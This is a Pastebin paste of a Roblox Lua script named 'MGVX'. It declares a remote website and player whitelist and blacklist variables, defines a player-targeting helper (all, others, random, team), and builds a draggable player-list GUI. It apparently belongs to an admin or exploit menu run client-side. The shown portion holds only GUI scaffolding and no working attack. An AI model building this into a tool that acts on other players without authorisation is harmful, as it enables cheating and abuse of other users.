Advertisement
Guest User

Untitled

a guest
May 13th, 2017
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 77.78 KB | None | 0 0
  1. local CoreValues = Instance.new("Folder")
  2. CoreValues.Name = "MGVXCore"
  3. CoreValues.Parent = game
  4.  
  5.  
  6. local Http = game:GetService("HttpService")
  7. local gWorkspace = game:GetService("Workspace")
  8. local OwnerGui = game:GetService("Players").LocalPlayer.PlayerGui
  9. local Website = "http://mgvx.tk/"
  10.  
  11. -- Makes Sure EveryThing Goes Ok!---
  12. print("MGVX LOADED")
  13.  
  14.  
  15. --------
  16. local WhiteList = nil
  17. local BlackListed = {}
  18. -- Variables---
  19.  
  20. Owner = game.Players.LocalPlayer
  21. local plr = Owner
  22. for i,v in pairs(game.Players:GetChildren())do if v.Name ~= plr then otherp = v end end
  23.  
  24.  
  25. ------------Functions----------
  26. function GetPlr(plr, str)
  27. local plrz = {} str = str:lower()
  28. if str == "all" then plrz = game.Players:children()
  29. elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v) end end
  30. else
  31. local sn = {1} local en = {}
  32. for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  33. for x = 1, #sn do
  34. if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") then table.insert(plrz, plr)
  35. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") then table.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  36. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  37. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  38. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  39. end end end
  40. elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  41. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  42. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  43. end end end
  44. else
  45. for a, plyr in pairs(game.Players:children()) do
  46. if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or (sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" and plyr.Name:lower():find(str) == 1) then
  47. table.insert(plrz, plyr) break
  48. end
  49. end
  50. end
  51. end
  52. end
  53. return plrz
  54. end
  55.  
  56. function findPlayer(name)
  57. for _, player in ipairs(game.Players:GetPlayers()) do
  58. if player.Name:lower() == name:lower() then
  59. return player
  60. end
  61. end
  62. end
  63. function WriteTxt(obj,message)
  64. local q = obj.Text
  65. obj.Text = q..""..message..""
  66.  
  67. end
  68.  
  69. local OwnerV = Instance.new("StringValue")
  70. OwnerV.Name = "Owner"
  71. OwnerV.Value = Owner.Name
  72. OwnerV.Parent = CoreValues
  73.  
  74. local OtherP = Instance.new("StringValue")
  75. OtherP.Name = "OtherP"
  76. OtherP.Value = otherp.Name
  77. OtherP.Parent = CoreValues
  78.  
  79. local NewGuiPart1 = Instance.new("ScreenGui")
  80. NewGuiPart1.Name = "MGVX"
  81. NewGuiPart1.Parent = Owner.PlayerGui
  82.  
  83.  
  84.  
  85. -------
  86. local NewGuiPart2 = Instance.new("Frame")
  87. NewGuiPart2.Active = true
  88. NewGuiPart2.Position = UDim2.new(0.368000001, 0, 0.0829999968, 0)
  89. NewGuiPart2.Size = UDim2.new(0, 300, 0, 350)
  90. NewGuiPart2.Style = Enum.FrameStyle.DropShadow
  91. NewGuiPart2.ClipsDescendants = true
  92. NewGuiPart2.Draggable = true
  93. NewGuiPart2.Parent = NewGuiPart1
  94. -------
  95. local NewGuiPart3 = Instance.new("TextButton")
  96. NewGuiPart3.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  97. NewGuiPart3.BackgroundTransparency = 0.69999998807907
  98. NewGuiPart3.BorderColor3 = Color3.new(0, 0, 0)
  99. NewGuiPart3.BorderSizePixel = 0
  100. NewGuiPart3.Name = "TL1"
  101. NewGuiPart3.Position = UDim2.new(0, 200, 0, 0)
  102. NewGuiPart3.Selectable = true
  103. NewGuiPart3.Size = UDim2.new(0, 80, 0, 20)
  104. NewGuiPart3.Style = Enum.ButtonStyle.Custom
  105. NewGuiPart3.FontSize = Enum.FontSize.Size14
  106. NewGuiPart3.Text = "Refresh"
  107. NewGuiPart3.TextColor3 = Color3.new(1, 1, 1)
  108. NewGuiPart3.Parent = NewGuiPart2
  109. -------
  110. local NewGuiPart4 = Instance.new("TextLabel")
  111. NewGuiPart4.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  112. NewGuiPart4.BackgroundTransparency = 1
  113. NewGuiPart4.BorderColor3 = Color3.new(0, 0, 0)
  114. NewGuiPart4.BorderSizePixel = 0
  115. NewGuiPart4.Name = "TL2"
  116. NewGuiPart4.Position = UDim2.new(0, 50, 0, 0)
  117. NewGuiPart4.Size = UDim2.new(0, 80, 0, 20)
  118. NewGuiPart4.FontSize = Enum.FontSize.Size14
  119. NewGuiPart4.Text = "Loading..."
  120. NewGuiPart4.TextColor3 = Color3.new(1, 1, 1)
  121. NewGuiPart4.TextScaled = true
  122. NewGuiPart4.TextWrapped = true
  123. NewGuiPart4.Parent = NewGuiPart2
  124. -------
  125. local NewGuiPart5 = Instance.new("Frame")
  126. NewGuiPart5.BackgroundColor3 = Color3.new(0, 0, 0)
  127. NewGuiPart5.BackgroundTransparency = 1
  128. NewGuiPart5.BorderSizePixel = 5
  129. NewGuiPart5.Name = "Main"
  130. NewGuiPart5.Position = UDim2.new(1, -280, 0.0829999968, 0)
  131. NewGuiPart5.Size = UDim2.new(0, 250, 0, 300)
  132. NewGuiPart5.Visible = false
  133. NewGuiPart5.Draggable = true
  134. NewGuiPart5.Parent = NewGuiPart2
  135. -------
  136. local NewGuiPart6 = Instance.new("ScrollingFrame")
  137. NewGuiPart6.BackgroundTransparency = 1
  138. NewGuiPart6.Name = "PlayerList"
  139. NewGuiPart6.Position = UDim2.new(0, -7, 0, -10)
  140. NewGuiPart6.Selectable = true
  141. NewGuiPart6.Size = UDim2.new(0, 290, 0, 320)
  142. NewGuiPart6.ClipsDescendants = true
  143. NewGuiPart6.Parent = NewGuiPart5
  144. -------
  145. local NewGuiPart7 = Instance.new("Frame")
  146. NewGuiPart7.BackgroundColor3 = Color3.new(0, 0, 0)
  147. NewGuiPart7.BackgroundTransparency = 1
  148. NewGuiPart7.BorderSizePixel = 0
  149. NewGuiPart7.Size = UDim2.new(0, 290, 0, 35)
  150. NewGuiPart7.Parent = NewGuiPart6
  151. -------
  152. local NewGuiPart8 = Instance.new("ImageLabel")
  153. NewGuiPart8.Active = false
  154. NewGuiPart8.BackgroundTransparency = 1
  155. NewGuiPart8.BorderSizePixel = 0
  156. NewGuiPart8.Position = UDim2.new(0, 10, 0, 15)
  157. NewGuiPart8.Selectable = false
  158. NewGuiPart8.Size = UDim2.new(0, 65, 0, 25)
  159. NewGuiPart8.Image = "http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username=ROBLOX"
  160. NewGuiPart8.Parent = NewGuiPart7
  161. -------
  162. local NewGuiPart9 = Instance.new("TextLabel")
  163. NewGuiPart9.BackgroundTransparency = 1
  164. NewGuiPart9.BorderSizePixel = 0
  165. NewGuiPart9.Position = UDim2.new(0, 100, 0, 15)
  166. NewGuiPart9.Size = UDim2.new(0, 100, 0, 25)
  167. NewGuiPart9.Font = Enum.Font.Legacy
  168. NewGuiPart9.FontSize = Enum.FontSize.Size10
  169. NewGuiPart9.Text = ""
  170. NewGuiPart9.TextColor3 = Color3.new(1, 1, 1)
  171. NewGuiPart9.TextScaled = true
  172. NewGuiPart9.TextWrapped = true
  173. NewGuiPart9.Parent = NewGuiPart7
  174. -------
  175. local NewGuiPart10 = Instance.new("Frame")
  176. NewGuiPart10.BackgroundColor3 = Color3.new(0, 0, 0)
  177. NewGuiPart10.BackgroundTransparency = 1
  178. NewGuiPart10.BorderSizePixel = 0
  179. NewGuiPart10.Position = UDim2.new(0, 0, 0, 35)
  180. NewGuiPart10.Size = UDim2.new(0, 290, 0, 35)
  181. NewGuiPart10.Parent = NewGuiPart6
  182. -------
  183. local NewGuiPart11 = Instance.new("ImageLabel")
  184. NewGuiPart11.Active = false
  185. NewGuiPart11.BackgroundTransparency = 1
  186. NewGuiPart11.BorderSizePixel = 0
  187. NewGuiPart11.Position = UDim2.new(0, 10, 0, 15)
  188. NewGuiPart11.Selectable = false
  189. NewGuiPart11.Size = UDim2.new(0, 65, 0, 25)
  190. NewGuiPart11.Image = ""
  191. NewGuiPart11.Parent = NewGuiPart10
  192. -------
  193. local NewGuiPart12 = Instance.new("TextLabel")
  194. NewGuiPart12.BackgroundTransparency = 1
  195. NewGuiPart12.BorderSizePixel = 0
  196. NewGuiPart12.Position = UDim2.new(0, 100, 0, 15)
  197. NewGuiPart12.Size = UDim2.new(0, 100, 0, 25)
  198. NewGuiPart12.Font = Enum.Font.Legacy
  199. NewGuiPart12.FontSize = Enum.FontSize.Size10
  200. NewGuiPart12.Text = ""
  201. NewGuiPart12.TextColor3 = Color3.new(1, 1, 1)
  202. NewGuiPart12.TextScaled = true
  203. NewGuiPart12.TextWrapped = true
  204. NewGuiPart12.Parent = NewGuiPart10
  205. -------
  206. local NewGuiPart13 = Instance.new("Frame")
  207. NewGuiPart13.BackgroundColor3 = Color3.new(0, 0, 0)
  208. NewGuiPart13.BackgroundTransparency = 1
  209. NewGuiPart13.BorderSizePixel = 0
  210. NewGuiPart13.Position = UDim2.new(0, 0, 0, 70)
  211. NewGuiPart13.Size = UDim2.new(0, 290, 0, 35)
  212. NewGuiPart13.Parent = NewGuiPart6
  213. -------
  214. local NewGuiPart14 = Instance.new("ImageLabel")
  215. NewGuiPart14.Active = false
  216. NewGuiPart14.BackgroundTransparency = 1
  217. NewGuiPart14.BorderSizePixel = 0
  218. NewGuiPart14.Position = UDim2.new(0, 10, 0, 15)
  219. NewGuiPart14.Selectable = false
  220. NewGuiPart14.Size = UDim2.new(0, 65, 0, 25)
  221. NewGuiPart14.Image = ""
  222. NewGuiPart14.Image = ""
  223. NewGuiPart14.Parent = NewGuiPart13
  224. -------
  225. local NewGuiPart15 = Instance.new("TextLabel")
  226. NewGuiPart15.BackgroundTransparency = 1
  227. NewGuiPart15.BorderSizePixel = 0
  228. NewGuiPart15.Position = UDim2.new(0, 100, 0, 15)
  229. NewGuiPart15.Size = UDim2.new(0, 100, 0, 25)
  230. NewGuiPart15.Font = Enum.Font.Legacy
  231. NewGuiPart15.FontSize = Enum.FontSize.Size10
  232. NewGuiPart15.Text = ""
  233. NewGuiPart15.TextColor3 = Color3.new(1, 1, 1)
  234. NewGuiPart15.TextScaled = true
  235. NewGuiPart15.TextWrapped = true
  236. NewGuiPart15.Parent = NewGuiPart13
  237. -------
  238. local NewGuiPart16 = Instance.new("Frame")
  239. NewGuiPart16.BackgroundColor3 = Color3.new(0, 0, 0)
  240. NewGuiPart16.BackgroundTransparency = 1
  241. NewGuiPart16.BorderSizePixel = 0
  242. NewGuiPart16.Position = UDim2.new(0, 0, 0, 105)
  243. NewGuiPart16.Size = UDim2.new(0, 290, 0, 35)
  244. NewGuiPart16.Parent = NewGuiPart6
  245. -------
  246. local NewGuiPart17 = Instance.new("ImageLabel")
  247. NewGuiPart17.Active = false
  248. NewGuiPart17.BackgroundTransparency = 1
  249. NewGuiPart17.BorderSizePixel = 0
  250. NewGuiPart17.Position = UDim2.new(0, 10, 0, 15)
  251. NewGuiPart17.Selectable = false
  252. NewGuiPart17.Size = UDim2.new(0, 65, 0, 25)
  253. NewGuiPart17.Image = ""
  254. NewGuiPart17.Image = ""
  255. NewGuiPart17.Parent = NewGuiPart16
  256. -------
  257. local NewGuiPart18 = Instance.new("TextLabel")
  258. NewGuiPart18.BackgroundTransparency = 1
  259. NewGuiPart18.BorderSizePixel = 0
  260. NewGuiPart18.Position = UDim2.new(0, 100, 0, 15)
  261. NewGuiPart18.Size = UDim2.new(0, 100, 0, 25)
  262. NewGuiPart18.Font = Enum.Font.Legacy
  263. NewGuiPart18.FontSize = Enum.FontSize.Size10
  264. NewGuiPart18.Text = ""
  265. NewGuiPart18.TextColor3 = Color3.new(1, 1, 1)
  266. NewGuiPart18.TextScaled = true
  267. NewGuiPart18.TextWrapped = true
  268. NewGuiPart18.Parent = NewGuiPart16
  269. -------
  270. local NewGuiPart19 = Instance.new("Frame")
  271. NewGuiPart19.BackgroundColor3 = Color3.new(0, 0, 0)
  272. NewGuiPart19.BackgroundTransparency = 1
  273. NewGuiPart19.BorderSizePixel = 0
  274. NewGuiPart19.Position = UDim2.new(0, 0, 0, 140)
  275. NewGuiPart19.Size = UDim2.new(0, 290, 0, 35)
  276. NewGuiPart19.Parent = NewGuiPart6
  277. -------
  278. local NewGuiPart20 = Instance.new("ImageLabel")
  279. NewGuiPart20.Active = false
  280. NewGuiPart20.BackgroundTransparency = 1
  281. NewGuiPart20.BorderSizePixel = 0
  282. NewGuiPart20.Position = UDim2.new(0, 10, 0, 15)
  283. NewGuiPart20.Selectable = false
  284. NewGuiPart20.Size = UDim2.new(0, 65, 0, 25)
  285. NewGuiPart20.Image = ""
  286. NewGuiPart20.Image = ""
  287. NewGuiPart20.Parent = NewGuiPart19
  288. -------
  289. local NewGuiPart21 = Instance.new("TextLabel")
  290. NewGuiPart21.BackgroundTransparency = 1
  291. NewGuiPart21.BorderSizePixel = 0
  292. NewGuiPart21.Position = UDim2.new(0, 100, 0, 15)
  293. NewGuiPart21.Size = UDim2.new(0, 100, 0, 25)
  294. NewGuiPart21.Font = Enum.Font.Legacy
  295. NewGuiPart21.FontSize = Enum.FontSize.Size10
  296. NewGuiPart21.Text = ""
  297. NewGuiPart21.TextColor3 = Color3.new(1, 1, 1)
  298. NewGuiPart21.TextScaled = true
  299. NewGuiPart21.TextWrapped = true
  300. NewGuiPart21.Parent = NewGuiPart19
  301. -------
  302. local NewGuiPart22 = Instance.new("Frame")
  303. NewGuiPart22.BackgroundColor3 = Color3.new(0, 0, 0)
  304. NewGuiPart22.BackgroundTransparency = 1
  305. NewGuiPart22.BorderSizePixel = 0
  306. NewGuiPart22.Position = UDim2.new(0, 0, 0, 175)
  307. NewGuiPart22.Size = UDim2.new(0, 290, 0, 35)
  308. NewGuiPart22.Parent = NewGuiPart6
  309. -------
  310. local NewGuiPart23 = Instance.new("ImageLabel")
  311. NewGuiPart23.Active = false
  312. NewGuiPart23.BackgroundTransparency = 1
  313. NewGuiPart23.BorderSizePixel = 0
  314. NewGuiPart23.Position = UDim2.new(0, 10, 0, 15)
  315. NewGuiPart23.Selectable = false
  316. NewGuiPart23.Size = UDim2.new(0, 65, 0, 25)
  317. NewGuiPart23.Image = ""
  318. NewGuiPart23.Image = ""
  319. NewGuiPart23.Parent = NewGuiPart22
  320. -------
  321. local NewGuiPart24 = Instance.new("TextLabel")
  322. NewGuiPart24.BackgroundTransparency = 1
  323. NewGuiPart24.BorderSizePixel = 0
  324. NewGuiPart24.Position = UDim2.new(0, 100, 0, 15)
  325. NewGuiPart24.Size = UDim2.new(0, 100, 0, 25)
  326. NewGuiPart24.Font = Enum.Font.Legacy
  327. NewGuiPart24.FontSize = Enum.FontSize.Size10
  328. NewGuiPart24.Text = ""
  329. NewGuiPart24.TextColor3 = Color3.new(1, 1, 1)
  330. NewGuiPart24.TextScaled = true
  331. NewGuiPart24.TextWrapped = true
  332. NewGuiPart24.Parent = NewGuiPart22
  333. -------
  334. local NewGuiPart25 = Instance.new("Frame")
  335. NewGuiPart25.BackgroundColor3 = Color3.new(0, 0, 0)
  336. NewGuiPart25.BackgroundTransparency = 1
  337. NewGuiPart25.BorderSizePixel = 0
  338. NewGuiPart25.Position = UDim2.new(0, 0, 0, 205)
  339. NewGuiPart25.Size = UDim2.new(0, 290, 0, 35)
  340. NewGuiPart25.Parent = NewGuiPart6
  341. -------
  342. local NewGuiPart26 = Instance.new("ImageLabel")
  343. NewGuiPart26.Active = false
  344. NewGuiPart26.BackgroundTransparency = 1
  345. NewGuiPart26.BorderSizePixel = 0
  346. NewGuiPart26.Position = UDim2.new(0, 10, 0, 15)
  347. NewGuiPart26.Selectable = false
  348. NewGuiPart26.Size = UDim2.new(0, 65, 0, 25)
  349. NewGuiPart26.Image = ""
  350. NewGuiPart26.Image = ""
  351. NewGuiPart26.Parent = NewGuiPart25
  352. -------
  353. local NewGuiPart27 = Instance.new("TextLabel")
  354. NewGuiPart27.BackgroundTransparency = 1
  355. NewGuiPart27.BorderSizePixel = 0
  356. NewGuiPart27.Position = UDim2.new(0, 100, 0, 15)
  357. NewGuiPart27.Size = UDim2.new(0, 100, 0, 25)
  358. NewGuiPart27.Font = Enum.Font.Legacy
  359. NewGuiPart27.FontSize = Enum.FontSize.Size10
  360. NewGuiPart27.Text = ""
  361. NewGuiPart27.TextColor3 = Color3.new(1, 1, 1)
  362. NewGuiPart27.TextScaled = true
  363. NewGuiPart27.TextWrapped = true
  364. NewGuiPart27.Parent = NewGuiPart25
  365. -------
  366. local NewGuiPart28 = Instance.new("Frame")
  367. NewGuiPart28.BackgroundColor3 = Color3.new(0, 0, 0)
  368. NewGuiPart28.BackgroundTransparency = 1
  369. NewGuiPart28.BorderSizePixel = 0
  370. NewGuiPart28.Position = UDim2.new(0, 0, 0, 240)
  371. NewGuiPart28.Size = UDim2.new(0, 290, 0, 35)
  372. NewGuiPart28.Parent = NewGuiPart6
  373. -------
  374. local NewGuiPart29 = Instance.new("ImageLabel")
  375. NewGuiPart29.Active = false
  376. NewGuiPart29.BackgroundTransparency = 1
  377. NewGuiPart29.BorderSizePixel = 0
  378. NewGuiPart29.Position = UDim2.new(0, 10, 0, 15)
  379. NewGuiPart29.Selectable = false
  380. NewGuiPart29.Size = UDim2.new(0, 65, 0, 25)
  381. NewGuiPart29.Image = ""
  382. NewGuiPart29.Image = ""
  383. NewGuiPart29.Parent = NewGuiPart28
  384. -------
  385. local NewGuiPart30 = Instance.new("TextLabel")
  386. NewGuiPart30.BackgroundTransparency = 1
  387. NewGuiPart30.BorderSizePixel = 0
  388. NewGuiPart30.Position = UDim2.new(0, 100, 0, 15)
  389. NewGuiPart30.Size = UDim2.new(0, 100, 0, 25)
  390. NewGuiPart30.Font = Enum.Font.Legacy
  391. NewGuiPart30.FontSize = Enum.FontSize.Size10
  392. NewGuiPart30.Text = ""
  393. NewGuiPart30.TextColor3 = Color3.new(1, 1, 1)
  394. NewGuiPart30.TextScaled = true
  395. NewGuiPart30.TextWrapped = true
  396. NewGuiPart30.Parent = NewGuiPart28
  397. -------
  398. local NewGuiPart31 = Instance.new("Frame")
  399. NewGuiPart31.BackgroundColor3 = Color3.new(0, 0, 0)
  400. NewGuiPart31.BackgroundTransparency = 1
  401. NewGuiPart31.BorderSizePixel = 0
  402. NewGuiPart31.Position = UDim2.new(0, 0, 0, 275)
  403. NewGuiPart31.Size = UDim2.new(0, 290, 0, 35)
  404. NewGuiPart31.Parent = NewGuiPart6
  405. -------
  406. local NewGuiPart32 = Instance.new("ImageLabel")
  407. NewGuiPart32.Active = false
  408. NewGuiPart32.BackgroundTransparency = 1
  409. NewGuiPart32.BorderSizePixel = 0
  410. NewGuiPart32.Position = UDim2.new(0, 10, 0, 15)
  411. NewGuiPart32.Selectable = false
  412. NewGuiPart32.Size = UDim2.new(0, 65, 0, 25)
  413. NewGuiPart32.Image = ""
  414. NewGuiPart32.Image = ""
  415. NewGuiPart32.Parent = NewGuiPart31
  416. -------
  417. local NewGuiPart33 = Instance.new("TextLabel")
  418. NewGuiPart33.BackgroundTransparency = 1
  419. NewGuiPart33.BorderSizePixel = 0
  420. NewGuiPart33.Position = UDim2.new(0, 100, 0, 15)
  421. NewGuiPart33.Size = UDim2.new(0, 100, 0, 25)
  422. NewGuiPart33.Font = Enum.Font.Legacy
  423. NewGuiPart33.FontSize = Enum.FontSize.Size10
  424. NewGuiPart33.Text = ""
  425. NewGuiPart33.TextColor3 = Color3.new(1, 1, 1)
  426. NewGuiPart33.TextScaled = true
  427. NewGuiPart33.TextWrapped = true
  428. NewGuiPart33.Parent = NewGuiPart31
  429. -------
  430. local NewGuiPart34 = Instance.new("Frame")
  431. NewGuiPart34.BackgroundColor3 = Color3.new(0, 0, 0)
  432. NewGuiPart34.BackgroundTransparency = 1
  433. NewGuiPart34.BorderSizePixel = 0
  434. NewGuiPart34.Position = UDim2.new(0, 0, 0, 305)
  435. NewGuiPart34.Size = UDim2.new(0, 290, 0, 35)
  436. NewGuiPart34.Parent = NewGuiPart6
  437. -------
  438. local NewGuiPart35 = Instance.new("ImageLabel")
  439. NewGuiPart35.Active = false
  440. NewGuiPart35.BackgroundTransparency = 1
  441. NewGuiPart35.BorderSizePixel = 0
  442. NewGuiPart35.Position = UDim2.new(0, 10, 0, 15)
  443. NewGuiPart35.Selectable = false
  444. NewGuiPart35.Size = UDim2.new(0, 65, 0, 25)
  445. NewGuiPart35.Image = ""
  446. NewGuiPart35.Image = ""
  447. NewGuiPart35.Parent = NewGuiPart34
  448. -------
  449. local NewGuiPart36 = Instance.new("TextLabel")
  450. NewGuiPart36.BackgroundTransparency = 1
  451. NewGuiPart36.BorderSizePixel = 0
  452. NewGuiPart36.Position = UDim2.new(0, 100, 0, 15)
  453. NewGuiPart36.Size = UDim2.new(0, 100, 0, 25)
  454. NewGuiPart36.Font = Enum.Font.Legacy
  455. NewGuiPart36.FontSize = Enum.FontSize.Size10
  456. NewGuiPart36.Text = ""
  457. NewGuiPart36.TextColor3 = Color3.new(1, 1, 1)
  458. NewGuiPart36.TextScaled = true
  459. NewGuiPart36.TextWrapped = true
  460. NewGuiPart36.Parent = NewGuiPart34
  461. -------
  462. local NewGuiPart37 = Instance.new("Frame")
  463. NewGuiPart37.BackgroundColor3 = Color3.new(0, 0, 0)
  464. NewGuiPart37.BackgroundTransparency = 1
  465. NewGuiPart37.BorderSizePixel = 0
  466. NewGuiPart37.Position = UDim2.new(0, 0, 0, 345)
  467. NewGuiPart37.Size = UDim2.new(0, 290, 0, 35)
  468. NewGuiPart37.Parent = NewGuiPart6
  469. -------
  470. local NewGuiPart38 = Instance.new("ImageLabel")
  471. NewGuiPart38.Active = false
  472. NewGuiPart38.BackgroundTransparency = 1
  473. NewGuiPart38.BorderSizePixel = 0
  474. NewGuiPart38.Position = UDim2.new(0, 10, 0, 15)
  475. NewGuiPart38.Selectable = false
  476. NewGuiPart38.Size = UDim2.new(0, 65, 0, 25)
  477. NewGuiPart38.Image = ""
  478. NewGuiPart38.Image = ""
  479. NewGuiPart38.Parent = NewGuiPart37
  480. -------
  481. local NewGuiPart39 = Instance.new("TextLabel")
  482. NewGuiPart39.BackgroundTransparency = 1
  483. NewGuiPart39.BorderSizePixel = 0
  484. NewGuiPart39.Position = UDim2.new(0, 100, 0, 15)
  485. NewGuiPart39.Size = UDim2.new(0, 100, 0, 25)
  486. NewGuiPart39.Font = Enum.Font.Legacy
  487. NewGuiPart39.FontSize = Enum.FontSize.Size10
  488. NewGuiPart39.Text = ""
  489. NewGuiPart39.TextColor3 = Color3.new(1, 1, 1)
  490. NewGuiPart39.TextScaled = true
  491. NewGuiPart39.TextWrapped = true
  492. NewGuiPart39.Parent = NewGuiPart37
  493. -------
  494. local NewGuiPart40 = Instance.new("Frame")
  495. NewGuiPart40.BackgroundColor3 = Color3.new(0, 0, 0)
  496. NewGuiPart40.BackgroundTransparency = 1
  497. NewGuiPart40.BorderSizePixel = 0
  498. NewGuiPart40.Position = UDim2.new(0, 0, 0, 375)
  499. NewGuiPart40.Size = UDim2.new(0, 290, 0, 35)
  500. NewGuiPart40.Parent = NewGuiPart6
  501. -------
  502. local NewGuiPart41 = Instance.new("ImageLabel")
  503. NewGuiPart41.Active = false
  504. NewGuiPart41.BackgroundTransparency = 1
  505. NewGuiPart41.BorderSizePixel = 0
  506. NewGuiPart41.Position = UDim2.new(0, 10, 0, 15)
  507. NewGuiPart41.Selectable = false
  508. NewGuiPart41.Size = UDim2.new(0, 65, 0, 25)
  509. NewGuiPart41.Image = ""
  510. NewGuiPart41.Image = ""
  511. NewGuiPart41.Parent = NewGuiPart40
  512. -------
  513. local NewGuiPart42 = Instance.new("TextLabel")
  514. NewGuiPart42.BackgroundTransparency = 1
  515. NewGuiPart42.BorderSizePixel = 0
  516. NewGuiPart42.Position = UDim2.new(0, 100, 0, 15)
  517. NewGuiPart42.Size = UDim2.new(0, 100, 0, 25)
  518. NewGuiPart42.Font = Enum.Font.Legacy
  519. NewGuiPart42.FontSize = Enum.FontSize.Size10
  520. NewGuiPart42.Text = ""
  521. NewGuiPart42.TextColor3 = Color3.new(1, 1, 1)
  522. NewGuiPart42.TextScaled = true
  523. NewGuiPart42.TextWrapped = true
  524. NewGuiPart42.Parent = NewGuiPart40
  525. -------
  526. local NewGuiPart43 = Instance.new("Frame")
  527. NewGuiPart43.BackgroundColor3 = Color3.new(0, 0, 0)
  528. NewGuiPart43.BackgroundTransparency = 1
  529. NewGuiPart43.BorderSizePixel = 0
  530. NewGuiPart43.Position = UDim2.new(0, 0, 0, 405)
  531. NewGuiPart43.Size = UDim2.new(0, 290, 0, 35)
  532. NewGuiPart43.Parent = NewGuiPart6
  533. -------
  534. local NewGuiPart44 = Instance.new("ImageLabel")
  535. NewGuiPart44.Active = false
  536. NewGuiPart44.BackgroundTransparency = 1
  537. NewGuiPart44.BorderSizePixel = 0
  538. NewGuiPart44.Position = UDim2.new(0, 10, 0, 15)
  539. NewGuiPart44.Selectable = false
  540. NewGuiPart44.Size = UDim2.new(0, 65, 0, 25)
  541. NewGuiPart44.Image = ""
  542. NewGuiPart44.Image = ""
  543. NewGuiPart44.Parent = NewGuiPart43
  544. -------
  545. local NewGuiPart45 = Instance.new("TextLabel")
  546. NewGuiPart45.BackgroundTransparency = 1
  547. NewGuiPart45.BorderSizePixel = 0
  548. NewGuiPart45.Position = UDim2.new(0, 100, 0, 15)
  549. NewGuiPart45.Size = UDim2.new(0, 100, 0, 25)
  550. NewGuiPart45.Font = Enum.Font.Legacy
  551. NewGuiPart45.FontSize = Enum.FontSize.Size10
  552. NewGuiPart45.Text = ""
  553. NewGuiPart45.TextColor3 = Color3.new(1, 1, 1)
  554. NewGuiPart45.TextScaled = true
  555. NewGuiPart45.TextWrapped = true
  556. NewGuiPart45.Parent = NewGuiPart43
  557. -------
  558. local NewGuiPart46 = Instance.new("Frame")
  559. NewGuiPart46.BackgroundColor3 = Color3.new(0, 0, 0)
  560. NewGuiPart46.BackgroundTransparency = 1
  561. NewGuiPart46.BorderSizePixel = 0
  562. NewGuiPart46.Position = UDim2.new(0, 0, 0, 445)
  563. NewGuiPart46.Size = UDim2.new(0, 290, 0, 35)
  564. NewGuiPart46.Parent = NewGuiPart6
  565. -------
  566. local NewGuiPart47 = Instance.new("ImageLabel")
  567. NewGuiPart47.Active = false
  568. NewGuiPart47.BackgroundTransparency = 1
  569. NewGuiPart47.BorderSizePixel = 0
  570. NewGuiPart47.Position = UDim2.new(0, 10, 0, 15)
  571. NewGuiPart47.Selectable = false
  572. NewGuiPart47.Size = UDim2.new(0, 65, 0, 25)
  573. NewGuiPart47.Image = ""
  574. NewGuiPart47.Image = ""
  575. NewGuiPart47.Parent = NewGuiPart46
  576. -------
  577. local NewGuiPart48 = Instance.new("TextLabel")
  578. NewGuiPart48.BackgroundTransparency = 1
  579. NewGuiPart48.BorderSizePixel = 0
  580. NewGuiPart48.Position = UDim2.new(0, 100, 0, 15)
  581. NewGuiPart48.Size = UDim2.new(0, 100, 0, 25)
  582. NewGuiPart48.Font = Enum.Font.Legacy
  583. NewGuiPart48.FontSize = Enum.FontSize.Size10
  584. NewGuiPart48.Text = ""
  585. NewGuiPart48.TextColor3 = Color3.new(1, 1, 1)
  586. NewGuiPart48.TextScaled = true
  587. NewGuiPart48.TextWrapped = true
  588. NewGuiPart48.Parent = NewGuiPart46
  589. -------
  590. local NewGuiPart49 = Instance.new("TextButton")
  591. NewGuiPart49.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  592. NewGuiPart49.BackgroundTransparency = 0.69999998807907
  593. NewGuiPart49.BorderColor3 = Color3.new(0, 0, 0)
  594. NewGuiPart49.BorderSizePixel = 0
  595. NewGuiPart49.Name = "TL3"
  596. NewGuiPart49.Position = UDim2.new(0, 200, 0, 25)
  597. NewGuiPart49.Selectable = true
  598. NewGuiPart49.Size = UDim2.new(0, 80, 0, 20)
  599. NewGuiPart49.Style = Enum.ButtonStyle.Custom
  600. NewGuiPart49.FontSize = Enum.FontSize.Size14
  601. NewGuiPart49.Text = "Settings"
  602. NewGuiPart49.TextColor3 = Color3.new(1, 1, 1)
  603. NewGuiPart49.Parent = NewGuiPart2
  604. -------
  605. local NewGuiPart50 = Instance.new("Frame")
  606. NewGuiPart50.BackgroundTransparency = 1
  607. NewGuiPart50.Name = "ScrollingFrame"
  608. NewGuiPart50.Position = UDim2.new(0, 0, 0, 50)
  609. NewGuiPart50.Size = UDim2.new(0, 290, 0, 280)
  610. NewGuiPart50.Visible = false
  611. NewGuiPart50.ClipsDescendants = true
  612. NewGuiPart50.Draggable = true
  613. NewGuiPart50.Parent = NewGuiPart2
  614.  
